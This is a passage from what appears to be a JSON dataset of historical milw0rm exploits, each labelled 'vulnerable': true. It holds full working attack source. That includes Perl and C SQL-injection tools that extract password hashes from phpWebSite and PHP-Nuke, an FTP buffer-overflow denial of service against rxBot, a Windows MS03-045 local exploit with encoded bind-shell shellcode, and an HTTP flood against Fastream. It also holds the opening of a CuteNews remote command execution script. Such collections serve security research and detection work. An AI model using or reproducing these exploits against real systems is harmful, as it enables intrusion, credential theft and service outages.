Return Addr : 0x%x\\n\\n\", ret);\n\n\n\n  memset(buf,0x41,sizeof(buf));\n\n  memcpy(&buf[92],&ret,4);\n\n\n\n  execve(prog[0],prog,env);\n\n\n\n }\n\n\n\n// milw0rm.com [2005-09-14]",
1120        "vulnerable": true
1121    },
1122    {
1123        "exploit_id": 1217,
1124        "content": "#!/usr/bin/perl\n\nuse LWP::Simple;\n\n \n\n$serv     =  $ARGV[0]; \n\n$path     =  $ARGV[1]; \n\n$name     =  $ARGV[2];\n\n    \n\nsub usage\n\n { \n\n    print \"\\nUsage: $0 [server] [path] [username] \\n\"; \n\n    print \"sever    -  URL\\n\"; \n\n    print \"path     -  path to index.php\\n\"; \n\n    print \"username -  name register user\\n\\n\"; \n\n    exit ();}  \n\n \n\nsub work\n\n {\n\n    print qq(\n\n       --------------------------------- \n\n#==---[    phpWebSite SQL-injection     |\n\n#==---[   tested ob phpWebSite-0.10.0   |\n\n#==---[  Gr33tz: blf, 1dt.w0lf, Pengo,  |\n\n#==---[       edisan, foster, whice     |\n\n#==---[ (c)oded by x97Rang 2005 RST/GHC |\n\n#==---[        http://rst.void.ru       |\n\n#==---[          http://ghc.ru          |\n\n       ---------------------------------\\n\\n);&chv;&board}\n\n       \n\nsub chv     \n\n {\n\n    $ver  = sprintf(\"http://%s%s/docs/CHANGELOG.txt\",$serv,$path);\n\n    $getv = get \"$ver\";\n\nif ($getv =~ /(phpWebSite-)(\\d{1})\\.(\\d{1,2})\\.(\\d{1})/){print\"[*] Version: $1$2.$3.$4\\n\";}}  \n\n \n\nsub board \n\n {\n\n    $URL = sprintf(\"http://%s%s/index.php?module=%27+union+select+username,password+from+mod_users+where+username=%27$name%27/*\",$serv,$path);   \n\n    $content = get \"$URL\";\n\nif ($content =~ /(\\<b\\>Search\\&\\#160\\;)(\\w{32})(\\<\\/b\\>)/){&showh;}else{print \"... One of those days :)\\n\";}}\n\n \n\nsub showh\n\n {\n\n    print \"[*] User: $name\\n\";\n\n    print \"[*] Hash: $2\\n\\n\";}\n\n    \n\nif (@ARGV != 3){&usage;}else{&work;}\n\n\n\n# milw0rm.com [2005-09-15]",
1125        "vulnerable": true
1126    },
1127    {
1128        "exploit_id": 1218,
1129        "content": "/* untested /str0ke */\n\n\n\n/*\n\n\trx-dos.c by D-oNe\t\n\n\n\n\tThere exists a buffer overflow in Stoneys FTPd that most rxBot mod's use.\n\n\tThe problem lies in how the code parses the PORT command and gives an opportunity\n\n\tfor a buffer overflow.\n\n\t\n\n\tProblem is that the ftpd also uses select() to handle multiple connections. So when\n\n\tsending the crafted PORT command select() returns NULL making it return and exit the\n\n\tFTPd thread resulting merely in a Denial Of Service of the FTPd with no crash of the bot\n\n\titself.\n\n\n\n\tTested with \"rxBot reptile 0.37\".\n\n*/\n\n\n\n#pragma comment(lib, \"ws2_32\")\n\n\n\n#include <stdio.h>\n\n#include <stdlib.h>\n\n#include <string.h>\n\n#include <winsock2.h>\n\n\n\nunsigned char user[] =\n\n\t\"\\x55\\x53\\x45\\x52\\x20\\x31\";\n\n\n\nunsigned char pass[] =\n\n\t\"\\x50\\x41\\x53\\x53\\x20\\x31\";\n\n\n\nunsigned char overflow[] =\n\n\t\"\\x50\\x4F\\x52\\x54\\x20\"\n\n\t\"\\x31\\x2C\\x31\\x2C\\x31\\x2C\\x31\\x2C\\x31\\x2C\\x31\"\n\n\t\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\n\n\t\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\n\n\t\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\n\n\t\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\n\n\t\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\n\n\t\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\n\n\t\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\n\n\t\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\n\n\t\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\n\n\t\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\n\n\t\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\n\n\t\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\n\n\t\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\n\n\t\"\\x90\\x90\";\n\n\n\nint main(int argc, char *argv[])\n\n{\n\n\tchar szBuffer[128];\n\n\tstruct sockaddr_in sin;\n\n\tSOCKET sock;\n\n\tWSADATA wsadata;\n\n\t\tprintf(\"\\nrxBot Stoney FTPd Denial Of Service Exploit by D-oNe\\n\\n\");\n\n\tif (argc < 3) \n\n\t{\n\n\t\t\tprintf(\"usage: %s <ip> <port>\\n\", argv[0]);\n\n\t\t\tprintf(\"[-] Exiting...\\n\");\n\n\t\t\treturn 0;\n\n\t}\n\n\tif (WSAStartup(0x0202, &wsadata) != 0)\n\n\t{\n\n\t\t\tprintf(\"[-] WSAStartup() failed!\\n\");\n\n\t\t\treturn 0;\n\n\t}\n\n\t\tsin.sin_family = AF_INET;\n\n\t\tsin.sin_addr.s_addr = inet_addr(argv[1]);\n\n\t\tsin.sin_port = htons(atoi(argv[2]));\n\n\t\tsock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);\n\n\tif (sock == SOCKET_ERROR)\n\n\t{\n\n\t\t\tprintf(\"[-] socket() failed!\\n\");\n\n\t\t\treturn 0;\n\n\t}\n\n\t\tprintf(\"[+] Connecting...\\n\");\n\n\tif (connect(sock, (struct sockaddr *)&sin, sizeof(sin)) == SOCKET_ERROR)\n\n\t{\n\n\t\t\tprintf(\"[-] connec()t failed!\\n\");\n\n\t\t\treturn 0;\n\n\t}\n\n\t\trecv(sock, szBuffer, sizeof(szBuffer) - 1, 0);\n\n\tif ((szBuffer[0] != '2') && (szBuffer[1] != '2') && (szBuffer[2] != '0'))\n\n\t{\n\n\t\t\tprintf(\"[-] Wrong string received!\\n\");\n\n\t\t\treturn 0;\n\n\t}\n\n\t\tprintf(\"[+] Sending USER...\\n\");\n\n\tif (!send(sock, user, sizeof(user), 0))\n\n\t{\n\n\t\t\tprintf(\"[-] send() failed!\\n\");\n\n\t\t\treturn 0;\n\n\t}\n\n\t\trecv(sock, szBuffer, sizeof(szBuffer) - 1, 0);\n\n\tif ((szBuffer[0] != '3') && (szBuffer[1] != '3') && (szBuffer[2] != '1'))\n\n\t{\n\n\t\t\tprintf(\"[-] Wrong string received!\\n\");\n\n\t\t\treturn 0;\n\n\t}\n\n\t\tprintf(\"[+] Sending PASS...\\n\");\n\n\tif (!send(sock, pass, sizeof(pass), 0))\n\n\t{\n\n\t\t\tprintf(\"[-] send() failed!\\n\");\n\n\t\t\treturn 0;\n\n\t}\n\n\t\trecv(sock, szBuffer, sizeof(szBuffer) - 1, 0);\n\n\tif ((szBuffer[0] != '2') && (szBuffer[1] != '3') && (szBuffer[2] != '0'))\n\n\t{\n\n\t\t\tprintf(\"[-] Wrong string received!\\n\");\n\n\t\t\treturn 0;\n\n\t}\n\n\t\tprintf(\"[+] Sending malicious PORT command...\\n\");\n\n\tif (!send(sock, overflow, sizeof(overflow), 0))\n\n\t{\n\n\t\t\tprintf(\"[-] send() failed!\\n\");\n\n\t\t\treturn 0;\n\n\t}\n\n\t\tmemset(szBuffer, 0, sizeof(szBuffer));\n\n\t\trecv(sock, szBuffer, sizeof(szBuffer) - 1, 0);\n\n\t\tszBuffer[strlen(szBuffer) - 1] = '\\0';\n\n\t\tprintf(\"[+] Recvd: %s\\n\", szBuffer);\n\n\t\tclosesocket(sock);\n\n\t\tWSACleanup();\n\n\t\tprintf(\"[+] FTPd should be out of service!\\n\", szBuffer);\n\n\t\treturn 0;\n\n}\n\n\n\n// milw0rm.com [2005-09-16]",
1130        "vulnerable": true
1131    },
1132    {
1133        "exploit_id": 1219,
1134        "content": "/***********************************************\n\n* PHP-Nuke <=7.8 SQL injection exploit\n\n* need MySQL > 4.0\n\n* (c)oded by 1dt.w0lf\n\n* RST/GHC\n\n* http://rst.void.ru\n\n* http://ghc.ru\n\n************************************************/\n\n// tested on 7.8\n\n\n\n#include <stdio.h>\n\n#include <string.h>\n\n#include <sys/types.h>\n\n#include <sys/socket.h>\n\n#include <netinet/in.h>\n\n#include <netdb.h>\n\n#include <regex.h>\n\n\n\n#define START 47\n\n#define END   103\n\n#define SZ    1024\n\n#define PORT  80\n\n#define PREFIX \"nuke_\"\n\n#define SQL \"name=PHP-Nuke%%207.8%%20Exploit'%%20UNION%%20SELECT%%201,1%%20FROM%%20%susers%%20WHERE%%20user_id=%d%%20AND%%20ascii(substring(user_password,%d,1))%c%d/*\"\n\n\n\n\n\nmain (int argc, char **argv) {\n\n int pos;\n\n int res = 0;\n\n char result[33];\n\n\t\n\n if(argc<4)\n\n  {\n\n  printf(\"Usage %s [host] [/folder/] [user_id]\\n\",argv[0]);\n\n  exit(1);\n\n  }\n\n \n\n printf(\"PHP-Nuke <= 7.8 SQL injection exploit\\n\"\n\n         \"-------------------------------------\\n\"\n\n         \"[~] Host : %s\\n[~] Folder: %s\\n\"\n\n         \"[!] Searching password for user with id : %d\\n\"\n\n         \"[!] Please wait...\\n\",argv[1],argv[2],atoi(argv[3]));  \n\n for(pos=1;pos<33;pos++)\n\n  {\t \n\n  found(argv[1],argv[2],atoi(argv[3]),START,END,pos,&res);  \n\n  sprintf(result+pos-1,\"%c\",res);\n\n  if(res == 0) { break; }\n\n  }\n\n result[33] = '\\0';\n\n if(strlen(result)>0) printf(\"[+] Password: %s\\n\",result);\n\n else printf(\"[-] Password not found\\n\");\n\n exit (0);\n\n}\n\n\n\nint found(char * host, char * folder, int user_id, int min, int max, int pos, int * res)\n\n {\n\n int i;\n\n int sr = (max - ((max-min)/2));\n\n if( (max-min) < 6 ) { i=(brute(host,folder,user_id,min,max,pos)); *res = i; }\n\n else if( (check(host,folder,pos,'>',sr,user_id)) == 1 ) { found(host,folder,user_id,sr,max,pos,res); }\n\n else { found(host,folder,user_id,min,sr,pos,res);\t} \n\n return 0;\n\n }\n\n\n\nint brute(char * host, char * folder, int user_id, int min, int max, int pos)\n\n {\t \n\n int i;\n\n for(i=min-1;i<max+1;i++)\n\n  {\n\n  if((check(host,folder,pos,'=',i, user_id)) == 1) { return i; }\n\n  }\n\n return 0;  \n\n }\t \n\n \n\nint check(char * host, char * folder, int pos, int chk, int test, int user_id)\n\n {\n\n char req[SZ]; \n\n char ans[SZ];\n\n char sql[SZ];\n\n int sock;\n\n struct hostent *hp;\n\n struct sockaddr_in sin;\n\n regex_t re;\n\n char *pattern = \"Sorry, this Module isn't active!\";\n\n \n\n if( (sock = socket (AF_INET, SOCK_STREAM, 0)) < 0 )\n\n  {\n\n   printf(\"[ ERROR ] Can't create socket!\\n\");\n\n   exit(1);\n\n  } \n\n  \n\n if( (regcomp( &re, pattern, REG_EXTENDED )) != 0 )\n\n  {\n\n  printf(\"[ ERROR ] REG ERROR!\\n\");\n\n  exit(1);\n\n  }\n\n  \n\n bzero(&sin, sizeof(sin));\n\n sin.sin_family = AF_INET;\n\n sin.sin_port   = htons(PORT);\n\n hp = gethostbyname (host);\n\n  \n\n memcpy ((char *)&sin.sin_addr,hp->h_addr,hp->h_length);\n\n connect (sock, (struct sockaddr *)&sin, sizeof(sin)); \n\n  \n\n bzero(req,sizeof(req));\n\n bzero(ans,sizeof(ans));\n\n bzero(sql,sizeof(sql));\t \n\n\t \n\n snprintf(sql,SZ-1,SQL,PREFIX,user_id,pos,chk,test);\t \n\n \n\n snprintf(req,SZ-1,\"POST %smodules.php HTTP/1.0\\n\"\n\n                  \"Host: %s\\n\"\n\n                  \"Content-Type: application/x-www-form-urlencoded\\n\"\n\n                  \"Content-Length: %d\\n\\n\"\n\n                  \"%s\\n\\n\\n\",\n\n                  folder,\n\n\t\t\t\t  host,\n\n                  strlen(sql),\n\n                  sql);\n\n \n\n write(sock, req, strlen(req));\n\n\n\n while( (read(sock, &ans, SZ-1)) > 0 )\n\n  {\n\n  if( (regexec( &re, ans, 0, NULL, 0)) == 0) { return 0; }\n\n  bzero(ans,sizeof(ans));\n\n  } \n\n close (sock); \n\n return 1;\t \n\n }\n\n\n\n// milw0rm.com [2005-09-16]",
1135        "vulnerable": true
1136    },
1137    {
1138        "exploit_id": 122,
1139        "content": "/*\n\n\\\tlocal ListBox/ComboBox exploit for Win32 \n\n/\t\n\n\\\tCreated by xCrZx crazy_einstein yahoo com /11.11.03/\n\n/\n\n\\\tUsage: MS03-045.exe <-t target> [-r return address]\n\n/\n\n\\\tthere is two targets: CB_DIR (for ComboBox), LB_DIR (for ListBox).\n\n/\n\n\\\tAs to return address it should be such as 0x0000XXYY\n\n/\t(and you should know that this address will be transformed\n\n\\\tinto unicode! And if XX and YY bytes <128 it will maintained!\n\n/\tAnd return address will be such as 0x00XX00YY!\n\n\\\tIf not it will be coded in two bytes each of this bytes and\n\n/\treturn will be looked like 0xZZZZWWWW)\n\n\\\n\n/\tTo figure out handle addresses you can use tools such as\n\n\\\tSpy++ (default tool contained in MSVC++ 6.0)\n\n/\n\n\\\tNote: \tthere is no so easy exploitation of this stuff!\n\n/\t\tfirst of all you should figure out the handle\n\n\\\t\taddresses of ListBox/ComboBox & EDIT,RichEdit,etc\n\n/\t\t(to store shellcode inside of it.. you can also\n\n\\\t\tstore shellcode by diffrent way into variables of\n\n/\t\tvuln program (i.e. through fopen(),argv,etc..)\n\n\\\n\n/\t\n\n\\\tyesh yesh y0...check it out y0...\n\n/\twu-tang clan forever :)\n\n\\\n\n/\tgreetzz to: tANDm :), Billi_k1d, alph4, btr, hhs, v1pee, ni69az,\n\n\\\t\t    akid, Joel Eriksson, andrewg, Amour and others...\n\n/\n\n\\       tested on WinXP (also should work on others Win32)\n\n/\n\n\\\tp.s. use can find vuln program with SYSTEM privileges (antivirus,firewall,etc)\n\n/            to obtain the SYSTEM privileges\n\n\\\n\n*/\n\n\n\n/*\n\n\\\n\n/\texample of work:\n\n\\\t-----------------\n\n/\n\n\\\tvuln program:\n\n/\n\n\\\tC:\\...ual Studio\\MyProjects\\vuln\\Debug>vuln.exe\n\n/\n\n\\\n\n/\tC:\\...ual Studio\\MyProjects\\vuln\\Debug>\n\n\\\n\n/\n\n\\\t-------\n\n/\n\n\\\texploit:\n\n/\n\n\\\tC:\\MSVCSTAFF\\Debug>85boom.exe -t 0\n\n/\n\n\\\t[MS03-045 local exploit by xCrZx /11.11.03/]\n\n/\n\n\\\tEnter addresses of the program handles:\n\n/\t<handle of Edit/RichEdit/etc (to store shellcode)> <handle of ListBox/ComboBox>\n\n\\\t(i.e. \"00450ca1 0066345c\") -> 1e01f6 2701a2\n\n/\n\n\\\t[+] Set shellcode!\n\n/\t--> Using LB_DIR command\n\n\\\t--> Using return address = 0x1515\n\n/\t[+] Set return addresses!\n\n\\\t[+] Sending shellcode message!\n\n/\t[+] Sending exploit message! Try to connect on 1981 port after 5 sec!\n\n\\\n\n/\n\n\\\t--------\n\n/\n\n\\\tMicrosoft Telnet> open localhost 1981\n\n/\n\n\\\t...\n\n/\n\n\\\tMicrosoft Windows XP [\u201a\u00a5\u00e0\u00e1\u00a8\u00ef 5.1.2600]\n\n/\t(\u2018) \u0160\u00ae\u00e0\u00af\u00ae\u00e0 \u00e6\u00a8\u00ef \u0152 \u00a9\u00aa\u00e0\u00ae\u00e1\u00ae\u00e4\u00e2, 1985-2001.\n\n\\\n\n/\tC:\\Program Files\\Microsoft Visual Studio\\MyProjects\\vuln\\Debug>\n\n\\\n\n*/\n\n\n\n\n\n#include <windows.h>\n\n#include <stdio.h>\n\n#include <tchar.h>\n\n\n\n\n\nchar shellcode[] =\n\n\n\n//bind on 1981\n\n\"\\xEB\\x0F\\x5B\\x80\\x33\\x93\\x43\\x81\\x3B\\x45\\x59\\x34\\x53\\x75\\xF4\\x74\"\n\n\"\\x05\\xE8\\xEC\\xFF\\xFF\\xFF\"\n\n//sc_bind_1981 for 2k/xp/2003 by ey4s\n\n//speacial version for ws_ftp base on v1.03.10.07\n\n//XOR with 0x93 (367 0x16F bytes)\n\n\"\\x12\\x7F\\x93\\x91\\x93\\x93\\x7A\\xA4\\x92\\x93\\x93\\xCC\\xF7\\x32\\xA3\\x93\"\n\n\"\\x93\\x93\\x18\\xD3\\x9F\\x18\\xE3\\x8F\\x3E\\x18\\xFB\\x9B\\xF9\\x97\\xCA\\x7B\"\n\n\"\\x4A\\x93\\x93\\x93\\x71\\x6A\\xFB\\xA0\\xA1\\x93\\x93\\xFB\\xE4\\xE0\\xA1\\xCC\"\n\n\"\\xC7\\x6C\\xC4\\x6F\\x18\\x7B\\xF9\\x95\\xCA\\x7B\\x2C\\x93\\x93\\x93\\x71\\x6A\"\n\n\"\\x12\\x7F\\x03\\x92\\x93\\x93\\xC7\\xFB\\x91\\x91\\x93\\x93\\x6C\\xC4\\x7B\\xC3\"\n\n\"\\xC3\\xC3\\xC3\\xF9\\x92\\xF9\\x91\\x6C\\xC4\\x63\\x18\\x4B\\x18\\x7F\\x54\\xD6\"\n\n\"\\x93\\x91\\x93\\x94\\x2E\\xA0\\x53\\x1A\\xD6\\x97\\xF9\\x83\\xC6\\xC0\\x6C\\xC4\"\n\n\"\\x67\\xC0\\xF9\\x92\\xC0\\x6C\\xC4\\x6B\\xC3\\xC3\\xC0\\x6C\\xC4\\x6F\\xC3\\x10\"\n\n\"\\x7F\\xCB\\x18\\x67\\xA0\\x48\\xF9\\x83\\xCA\\x1A\\x8F\\x1D\\x71\\x68\\x78\\xBF\"\n\n\"\\xD3\\xD3\\xD3\\xD3\\xD3\\xD3\\xD3\\xD3\\xD3\\xD3\\xD3\\xD3\\xD3\\xD3\\xD3\\xD3\"\n\n\"\\xD3\\xD3\\xD3\\xD3\\x03\\x03\\x03\\x03\\xD3\\xD3\\xD3\\xD3\\xD3\\xD3\\xD3\\xD3\"\n\n\"\\xE9\\x35\\xFF\\xFF\\xFF\\xD3\\xD3\\xD3\\xD3\\xD3\\xD3\\xD3\\x1A\\xD5\\xAB\\x1A\"\n\n\"\\xD5\\xAF\\x1A\\xD5\\xD3\\x54\\xD5\\xBF\\x92\\x92\\x93\\x93\\x1E\\xD5\\xD7\\xC3\"\n\n\"\\xC5\\xC0\\xC0\\xC0\\xF9\\x92\\xC0\\xC0\\x1E\\xD5\\xC7\\x54\\x93\\xF0\\xFE\\xF7\"\n\n\"\\x93\\xC3\\xC0\\x6C\\xC4\\x73\\xA0\\x53\\xDB\\xC3\\x6C\\xE5\\xD7\\x6C\\xC4\\x4F\"\n\n\"\\x10\\x57\\xCB\\x6C\\xC4\\x7F\\x6C\\xC4\\x7F\\xC3\\x6C\\xC4\\x4B\\xC2\\x18\\xE6\"\n\n\"\\xAF\\x18\\xE7\\xBD\\xEB\\x90\\x66\\xC5\\x18\\xE5\\xB3\\x90\\x66\\xA0\\x5A\\xDA\"\n\n\"\\xD2\\x3E\\x90\\x56\\xA0\\x48\\xA0\\x41\\x9C\\x2D\\x83\\xA9\\x45\\xE7\\x9B\\x52\"\n\n\"\\x58\\x88\\x90\\x49\\xD3\\x78\\x7C\\xA8\\x8C\\xE6\\x76\\xCD\\x18\\xCD\\xB7\\x90\"\n\n\"\\x4E\\xF5\\x18\\x9F\\xD8\\x18\\xCD\\x8F\\x90\\x4E\\x18\\x97\\x18\\x90\\x56\\x38\"\n\n\"\\xCA\\x50\\x7B\\x57\\x6D\\x6C\\x6C\\x7A\\x28\\x50\\x3D\\x27\\xEE\\x86\\x0B\\x58\"\n\n\"\\xD1\\xE4\\x2B\\x4F\\x4E\\x89\\xA0\\xBE\\x87\\xC5\\x3D\\x55\\xB8\\x2E\\xBD\\x4D\"\n\n\"\\xC4\\xE1\\x37\\xB7\\x21\\xA1\\x93\\x9D\\xCE\\x58\\x4D\\xE7\\xB1\\xF0\\x5B\"\n\n//decode end sign\n\n\"\\x45\\x59\\x34\\x53\";\n\n\n\n\n\n#define SIZE 60000\n\n\n\nint main(int argc, char **argv) {\n\n\n\n\tHWND target=(HWND)0x240302;\n\n\tHWND target2;\n\n\tchar buf[SIZE+5];\n\n\tchar b0000[30000];\n\n\tlong ret=0x00001515;\n\n\tint trigger=0;\n\n\n\n\tprintf(\"\\n[MS03-045 local exploit by xCrZx /11.11.03/]\\n\\n\");\n\n\n\n\tif(argc==1) {\t\n\n\t\t\tprintf( \"Usage: %s <-t N> [-r return address]\\n\\n\"\t\t\n\n\t\t\t\"N targets (-t option):\\n\\n\\t0 - LB_DIR\\n\\t1 - CB_DIR\\n\\n\"\n\n\t\t\t,argv[0]);\n\n\t\t\texit(0); \n\n\t\t\t}\n\n\n\n\tfor(int j=0;j<argc;j++) {\n\n\t\tif(strcmp(argv[j],\"-t\")==NULL) { trigger = atoi(argv[j+1]); }\n\n\t\tif(strcmp(argv[j],\"-r\")==NULL) { ret = strtoul(argv[j+1],0,16); }\n\n\t}\n\n\n\nprintf(\"Enter addresses of the program handles:\\n<handle of Edit/RichEdit/etc (to store shellcode)> \n\n<handle of ListBox/ComboBox>\\n(i.e. \\\"00450ca1 0066345c\\\") -> \");fflush(stdout);\n\n\tscanf(\"%x %x\",&target2,&target);\n\n\n\n\n\n\tmemset(buf,0x00,sizeof buf);\n\n\tmemset(b0000,0x00,sizeof b0000);\n\n\n\n\tprintf(\"\\n[+] Set shellcode!\\n\");\n\n\n\n\tmemset(b0000,0x90,sizeof(b0000)-strlen(shellcode)-1);\n\n\tmemcpy(b0000+strlen(b0000),&shellcode,strlen(shellcode));\n\n\n\n\tprintf(\"--> Using %s command\\n\",(trigger)?(\"CB_DIR\"):(\"LB_DIR\"));\n\n\tprintf(\"--> Using return address = 0x%x\\n\",ret);\n\n\tprintf(\"[+] Set return addresses!\\n\");\n\n\n\n\tfor(int i=0;i<SIZE/4;i++)\n\n\t\t*(long *)&buf[strlen(buf)]=ret;\n\n\t\t\n\n\tprintf(\"[+] Sending shellcode message!\\n\"); \n\n\n\n\tSendMessage(target2,WM_SETTEXT,0,(LPARAM)b0000);\n\n\n\n\tprintf(\"[+] Sending exploit message! Try to connect on 1981 port after 5 sec!\\n\"); \n\n\n\n\tSendMessage(target , (trigger)?(CB_DIR):(LB_DIR) , \n\n\t\t\tDDL_READWRITE | DDL_DIRECTORY | DDL_DRIVES ,\n\n\t\t\t(LPARAM)buf\n\n\t);\n\n\n\n\n\n\n\n\n\n\treturn 0;\n\n}\n\n\n\n------------------------------------------------------------------------------------------------------------\n\n// zzz.cpp : Defines the entry point for the application.\n\n//\n\n\n\n#include \"stdafx.h\"\n\n#include <windows.h>\n\n\n\n\n\nLRESULT CALLBACK WndProc(HWND hwnd , UINT msg , WPARAM wp , LPARAM lp) {\n\n\tstatic HWND list;\n\n\tstatic HWND rich;\n\n\n\n\tswitch (msg) {\n\n\tcase WM_DESTROY:\n\n\t\tPostQuitMessage(0);\n\n\t\treturn 0;\n\n\tcase WM_CREATE:\n\n\t\tlist = CreateWindow(\n\n\t\t\tTEXT(\"LISTBOX\") , NULL , \n\n\t\t\tWS_CHILD | WS_VISIBLE | LBS_STANDARD , \n\n\t\t\t0 , 0 , 300 , 300 , hwnd , (HMENU)1 ,\n\n\t\t\t((LPCREATESTRUCT)(lp))->hInstance , NULL\n\n\t\t);\n\n\t\trich = CreateWindow(\"EDIT\",      // predefined class \n\n                                    NULL,        // no window title \n\n                                    WS_CHILD | WS_VISIBLE | WS_VSCROLL | \n\n                                    ES_LEFT | ES_MULTILINE | ES_AUTOVSCROLL, \n\n                                    300, 300, 100, 100,  // set size in WM_SIZE message \n\n                                    hwnd,        // parent window \n\n                                    (HMENU) 1,   // edit control ID \n\n                                    (HINSTANCE) GetWindowLong(hwnd, GWL_HINSTANCE), \n\n                                    NULL);  \n\n\t\treturn 0;\n\n\t}\n\n\treturn DefWindowProc(hwnd , msg , wp , lp);\n\n}\n\n\n\nint WINAPI WinMain(HINSTANCE hInstance , HINSTANCE hPrevInstance ,\n\n\t\t\tPSTR lpCmdLine , int nCmdShow ) {\n\n\tHWND hwnd;\n\n\tMSG msg;\n\n\tWNDCLASS winc;\n\n\n\n\n\n\twinc.style\t\t= CS_HREDRAW | CS_VREDRAW;\n\n\twinc.lpfnWndProc\t= WndProc;\n\n\twinc.cbClsExtra\t= winc.cbWndExtra\t= 0;\n\n\twinc.hInstance\t\t= hInstance;\n\n\twinc.hIcon\t\t= LoadIcon(NULL , IDI_APPLICATION);\n\n\twinc.hCursor\t\t= LoadCursor(NULL , IDC_ARROW);\n\n\twinc.hbrBackground\t= (HBRUSH)GetStockObject(WHITE_BRUSH);\n\n\twinc.lpszMenuName\t= NULL;\n\n\twinc.lpszClassName\t= TEXT(\"KITTY\");\n\n\n\n\tif (!RegisterClass(&winc)) return -1;\n\n\n\n\thwnd = CreateWindow(\n\n\t\t\tTEXT(\"KITTY\") , TEXT(\"Kitty on your lap\") ,\n\n\t\t\tWS_OVERLAPPEDWINDOW | WS_VISIBLE ,\n\n\t\t\tCW_USEDEFAULT , CW_USEDEFAULT ,\n\n\t\t\tCW_USEDEFAULT , CW_USEDEFAULT ,\n\n\t\t\tNULL , NULL , hInstance , NULL\n\n\t);\n\n\n\n\tif (hwnd == NULL) return -1;\n\n\n\n\twhile(GetMessage(&msg , NULL , 0 , 0)) {\n\n\t\tTranslateMessage(&msg);\n\n\t\tDispatchMessage(&msg);\n\n\t}\n\n\treturn msg.wParam;\n\n}\n\n\n\n// milw0rm.com [2003-11-14]",
1140        "vulnerable": true
1141    },
1142    {
1143        "exploit_id": 1220,
1144        "content": "#Fastream NETFile FTP/Web Server 7.1.2 Professional DoS Exploit\n\n#Bug found by bratax ck\n\n#Coded bY karak0rsan\n\n#d0gma.org // unuver.com\n\n#Greetz:hurby,phalaposher,l4m3r,Atak,spymaster,razor...\n\n\n\n$host=$ARGV[0];\n\n$port=$ARGV[1];\n\n\n\nif(!$ARGV[1]){\n\n       print \"Fastream FTP/Web Server DoS\\n\";\n\n       print \"Coded by karak0rsan // unuver.com\\n\";\n\n       print \"Usage:perl $0 [target] [port]\\n\";\n\n}\n\n\n\nuse IO::Socket;\n\n$socket = new IO::Socket::INET( PeerAddr => $host,\n\nPeerPort => $port,\n\nProto => 'tcp',\n\nType => SOCK_STREAM, ) or die \"Couldn't Connect!\\n\";;\n\nclose($socket);\n\nif($socket){\n\n       print \"\\n\";\n\n       print \"[+]Attacking..!\\n\";\n\n       }\n\n\n\nfor($i= 0; $i < 100; $i++)\n\n{\n\n$socket1 = new IO::Socket::INET( PeerAddr => $host,\n\nPeerPort => $port,\n\nProto => 'tcp',\n\nType => SOCK_STREAM, );\n\nprint $socket1 \"HEAD / HTTP/1.0\\r\\n\\r\\n\";\n\nclose($socket1);\n\n}\n\nprint \"Attack finished ;)\\n\";\n\nexit();\n\n\n\n#EoF\n\n\n\n# milw0rm.com [2005-09-16]",
1145        "vulnerable": true
1146    },
1147    {
1148        "exploit_id": 1221,
1149        "content": "<?php\n\n#   cutenxpl.php                                                               #\n\n#                                                                              #\n\n#          CuteNews 1.4.0(possibly prior versions) remote code execution       #\n\n#                              by rgod                                         #\n\n#                  site: http://rgod.altervista.org                            #\n\n#                                                                              #\n\n#  usage: launch form Apache, fill in requested fields, then go!               #\n\n#                                                                              #\n\n#  make these changes in php.ini if you have troubles                          #\n\n#  with this script:                                                           #\n\n#  allow_call_time_pass_reference = on                                         #\n\n#  register_globals = on                                                       #\n\n#                                                                              #\n\n#  Sun Tzu: \"In the  practical art of war, the  best thing of all  is to  take #\n\n#  the enemy's  country whole and  intact;  to  shatter and destroy it is  not #\n\n#  so good. So, too, it is better to recapture an army entire than to  destroy #\n\n#  it, to capture a regiment, a detachment or a company entire than to destroy #\n\n#  them.\"                                                                      #\n\n\n\nerror_reporting(0);\n\nini_set(\"max_execution_time\",0);\n\nini_set(\"default_socket_timeout\", 2);\n\nob_implicit_flush (1);\n\n\n\necho'<head><title>CuteNews <= 1.4.0  remote  commands  execution </title>  <meta\n\nhttp-equiv=\"Content-Type\"  content=\"text/html; charset=iso-8859-1\"> <style type=\n\n\"text/css\"> <!-- body,td,th {color:  #00FF00;} body {background-color: #000000;}\n\n.Stile5 {font-family: Verdana, Arial, Helvetica,  sans-serif; font-size: 10px; }\n\n.Stile6 {font-family: Verdana, Arial, Helvetica, sans-serif; font-weight:  bold;\n\nfont-style: italic; } --> </style></head> <body> <p class=\"Stile6\"> CuteNews  <=\n\n1 . 4 . 0  (possibly prior versions) remote commands execution</p><p class=\"Stil\n\ne6\">a script by rgod at <a href=\"http://rgod.altervista.org\"    target=\"_blank\">\n\nhttp://rgod.altervista.org</a></p><table width=\"84%\"><tr><td width=\"43%\"> <form\n\nname=\"form1\" method=\"post\"   action=\"'.$SERVER[PHP_SELF].'?path=value&host=\n\nvalue&port=value&command=value&proxy=value&main=value\">   <p>       <input type=\n\n\"text\" name=\"host\"><span class=\"Stile5\">hostname (ex: www.sitename.com)  </span>\n\n</p><p><input 